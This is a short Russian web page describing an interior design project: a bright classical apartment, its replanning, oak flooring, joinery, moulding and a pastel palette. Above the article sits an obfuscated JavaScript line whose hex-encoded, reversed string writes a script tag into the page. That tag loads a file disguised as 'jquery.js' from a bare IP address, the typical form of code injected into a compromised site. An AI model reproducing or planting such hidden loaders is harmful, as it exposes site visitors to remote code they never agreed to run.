var _0x2515=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x2515[5]](_0x2515[4][_0x2515[3]](_0x2515[0])[_0x2515[2]]()[_0x2515[1]](_0x2515[0]));

Дизайн создавался исходя из желания заказчика сделать интерьер светлым, легким, классическим, но при этом избежать массивных элементов в мебели и декоре. Требовалось сохранить максимум воздуха без ущерба для функциональности помещения. За основу был взят классический интерьер.

В ходе перепланировки было принято решение разделить кухню и гостиную между собой перегородкой. Также от гостиной был отделен коридор. Увеличили площадь ванной путем присоединения санузла. По желанию заказчика в квартире соорудили две гардеробных, одна общая – для гостей, а вторая гардеробная расположилась в хозяйской спальне.

В оформлении помещений преобладает фактура дерева: полы во всех помещениях выложены доской из дуба. Традиционную стилистику подчеркивают индивидуальные столярные изделия из дерева с белым финишем, а также лепные карнизы, потолочные розетки и настенные барельефы, украшенные рамами. На общую идею светлого воздушного интерьера работает пастельная цветовая гамма с преобладанием оттенков кофе с молоком и слоновая кость.